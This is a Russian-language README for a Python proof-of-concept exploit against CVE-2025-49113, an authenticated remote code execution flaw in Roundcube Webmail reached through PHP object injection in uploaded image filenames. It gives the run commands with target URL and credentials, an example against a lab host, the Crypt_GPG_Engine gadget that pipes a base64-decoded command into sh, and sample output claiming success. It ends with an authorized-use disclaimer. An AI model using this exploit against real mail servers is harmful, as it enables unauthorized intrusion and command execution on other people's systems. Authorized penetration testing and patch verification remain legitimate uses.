
💥 Python-эксплойт для CVE-2025-49113 | RCE в Roundcube Webmail через внедрение объектов PHP
CVE ID: CVE-2025-49113
Тип эксплойта: Удаленное выполнение кода (через PHP Object Injection)
Приложение: Roundcube Webmail ≤ 1.5.9 и ≤ 1.6.10
Язык эксплойта: Python
Автор: 00xCanelo
Статус: Протестировано и работает на уязвимых установках Roundcube
Этот эксплойт использует уязвимость в том, как Roundcube Webmail обрабатывает имена загружаемых изображений, которые десериализуются как PHP-объекты. Создавая вредоносную полезную нагрузку, запускающую цепочку десериализации Crypt_GPG_Engine, можно добиться удаленного выполнения команд после аутентификации.
Этот Python PoC имитирует цепочку атак, используемую в публичном PHP-эксплойте, но с более чистым кодом, опциональным логированием и простотой использования в инструментах для пентеста.
pip install requestspython3 CVE-2025-49113.py <target_url> <username> <password> <command>
python3 CVE-2025-49113.py https://mail.target.htb/ [email protected] 'P@ssw0rd123' 'id'
PHP-класс Crypt_GPG_Engine позволяет устанавливать поле _gpgconf, которое затем передается в выполнение оболочки.
Наша полезная нагрузка формирует:
echo "<base64-encoded-cmd>" | base64 -d | sh
в _gpgconf, что приводит к RCE при десериализации.
[*] Starting CVE-2025-49113 exploit...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10606
[+] Target is vulnerable!
[*] Logging in...
[+] Login successful.
[*] Uploading serialized gadget as image filename...
[+] Gadget uploaded successfully!
.
├── CVE-2025-49113.py # Python PoC script
└── README.md # This documentation
Этот код предназначен только для образовательных целей и авторизованного тестирования безопасности. Любое неправомерное использование этого инструмента строго запрещено. Автор не несет ответственности за любой причиненный ущерб.